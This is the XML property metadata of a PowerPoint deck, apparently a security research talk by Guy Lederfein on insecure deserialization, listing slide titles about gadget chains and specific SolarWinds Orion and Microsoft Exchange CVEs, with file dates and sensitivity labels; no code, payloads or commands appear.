      <vt:lpstr>Deserialization Gadgets</vt:lpstr>
      <vt:lpstr>Open-Source Libraries for Gadget Generation</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS – HashMap Class</vt:lpstr>
      <vt:lpstr>Example Gadget - URLDNS – HashMap Class</vt:lpstr>
      <vt:lpstr>Example Gadget – URLDNS – HashMap Class</vt:lpstr>
      <vt:lpstr>Example Gadget – URLDNS – URL Class</vt:lpstr>
      <vt:lpstr>Example Gadget – URLDNS – URLStreamHandler Class</vt:lpstr>
      <vt:lpstr>Example Gadget – URLDNS – URLStreamHandler Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform</vt:lpstr>
      <vt:lpstr>CVE-2021-31474 | ZDI-21-602</vt:lpstr>
      <vt:lpstr>CVE-2021-31474 | ZDI-21-602</vt:lpstr>
      <vt:lpstr>Json.NET Deserialization</vt:lpstr>
      <vt:lpstr>SerializationBinder</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.4 – ActionControllerImplementation Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.4 – ActionControllerImplementation Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.4 – ActionControllerImplementation Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.4 – BlackListBinder Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.4 – BlackListBinder Class</vt:lpstr>
      <vt:lpstr>Path to Exploitation</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – ActionContextBase Class</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – MacroContext Class</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – ContextBase Class</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – SwisEntityContext Class</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – PropertyBag Class</vt:lpstr>
      <vt:lpstr>Building an object with a nested gadget – Final Payload</vt:lpstr>
      <vt:lpstr>CVE-2021-31474 | ZDI-21-602 - Summary</vt:lpstr>
      <vt:lpstr>CVE-2021-35215 | ZDI-21-1245</vt:lpstr>
      <vt:lpstr>CVE-2021-35215 | ZDI-21-1245</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – Orion_RenderControl Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – PropertySetter Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – Orion_RenderControl Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – TemplateControl Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – Orion_RenderControl Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – PropertySetter Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – PropertySetter Class</vt:lpstr>
      <vt:lpstr>Path to Exploitation</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – ActionPluginBaseView Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – ActionPluginBaseView Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – ActionPluginBaseView Class</vt:lpstr>
      <vt:lpstr>SolarWinds Orion Platform 2020.2.5 – ActionPluginBaseView Class</vt:lpstr>
      <vt:lpstr>Path to Exploitation</vt:lpstr>
      <vt:lpstr>Final Payload</vt:lpstr>
      <vt:lpstr>CVE-2021-35215 | ZDI-21-1245 - Summary</vt:lpstr>
      <vt:lpstr>Microsoft Exchange</vt:lpstr>
      <vt:lpstr>BinaryFormatter</vt:lpstr>
      <vt:lpstr>CVE-2021-42321</vt:lpstr>
      <vt:lpstr>CVE-2021-42321</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 TypedBinaryFormatter Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 ExchangeBinaryFormatterFactory Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library System.Security.Claims.ClaimsPrincipal Class</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library System.Security.Claims.ClaimsPrincipal Class</vt:lpstr>
      <vt:lpstr>Path to Deserialization Sink</vt:lpstr>
      <vt:lpstr>Path to Deserialization Sink</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.9 OrgExtensionSerializer Class</vt:lpstr>
      <vt:lpstr>CreateUserConfiguration operation</vt:lpstr>
      <vt:lpstr>GetClientAccessToken operation</vt:lpstr>
      <vt:lpstr>CVE-2021-42321 - Summary</vt:lpstr>
      <vt:lpstr>CVE-2022-21969</vt:lpstr>
      <vt:lpstr>CVE-2022-21969</vt:lpstr>
      <vt:lpstr>CVE-2022-21969 – Call Path</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.14 ExchangeCertificateRpc Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.14 ExchangeBinaryFormatterFactory Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.14 Serialization Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.14 Data.settings.ini</vt:lpstr>
      <vt:lpstr>CVE-2022-21969</vt:lpstr>
      <vt:lpstr>Gadget for NTLM Relay</vt:lpstr>
      <vt:lpstr>DirectoryInfo Constructor</vt:lpstr>
      <vt:lpstr>CVE-2022-21969 - Summary</vt:lpstr>
      <vt:lpstr>CVE-2022-23277</vt:lpstr>
      <vt:lpstr>CVE-2022-23277</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.15 Serialization Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.15 Data.settings.ini</vt:lpstr>
      <vt:lpstr>CVE-2022-23277</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.15 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.15 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>[MS-NRBF]: .NET Remoting: Binary Format Data Structure</vt:lpstr>
      <vt:lpstr>[MS-NRBF]: .NET Remoting: Binary Format Data Structure</vt:lpstr>
      <vt:lpstr>[MS-NRTP]: .NET Remoting: Core Protocol</vt:lpstr>
      <vt:lpstr>[MS-NRTP]: .NET Remoting: Core Protocol</vt:lpstr>
      <vt:lpstr>Assembly Qualified Name</vt:lpstr>
      <vt:lpstr>Type Binding with BinaryFormatter</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library ObjectReader Class</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library ObjectReader Class</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library ObjectReader Class</vt:lpstr>
      <vt:lpstr>ChainedSerializationBinder Bypass</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU11 - 15.2.986.15 ChainedSerializationBinder Class</vt:lpstr>
      <vt:lpstr>Microsoft Common Object Runtime Library ObjectReader Class</vt:lpstr>
      <vt:lpstr>CVE-2022-23277 - Summary</vt:lpstr>
      <vt:lpstr>CVE-2022-41082 | ZDI-22-1624</vt:lpstr>
      <vt:lpstr>CVE-2022-41082 | ZDI-22-1624</vt:lpstr>
      <vt:lpstr>Exchange Management Shell</vt:lpstr>
      <vt:lpstr>[MS-PSRP]: PowerShell Remoting Protocol</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 InternalDeserializer Class</vt:lpstr>
      <vt:lpstr>PowerShell Type Definitions (exchange.partial.types.ps1xml)</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 SerializationTypeConverter Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 ExchangeBinaryFormatterFactory Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 SerializationTypeConverter Class</vt:lpstr>
      <vt:lpstr>[MS-NRTP]: .NET Remoting: Core Protocol</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 InternalDeserializer Class</vt:lpstr>
      <vt:lpstr>Exchange 2019 CU12 - 15.2.1118.7 LanguagePrimitives Class</vt:lpstr>
      <vt:lpstr>Example RCE Payload – TargetTypeForDeserialization</vt:lpstr>
      <vt:lpstr>Example RCE Payload – FigureParseConversion</vt:lpstr>
      <vt:lpstr>Example RCE Payload – Final Payload</vt:lpstr>
      <vt:lpstr>CVE-2022-41082 - Summary</vt:lpstr>
      <vt:lpstr>How to NOT get Pwned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Current State of Insecure Deserialization Vulnerabilities</dc:title>
  <dc:creator>Guy Lederfein (TR-CA)</dc:creator>
  <cp:lastModifiedBy>Guy Lederfein (TR-CA)</cp:lastModifiedBy>
  <cp:revision>114</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-25T20:11:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-03T23:29:09Z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0d67e-2428-41a1-85f0-bee73fd61572_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_SetDate">
    <vt:lpwstr>2023-01-03T20:51:50Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_Name">
    <vt:lpwstr>Public Information - no protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_SiteId">
    <vt:lpwstr>3e04753a-ae5b-42d4-a86d-d6f05460f9e4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_ActionId">
    <vt:lpwstr>78755571-0cd3-4c6b-88ab-7ec2513cc087</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_fb50d67e-2428-41a1-85f0-bee73fd61572_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>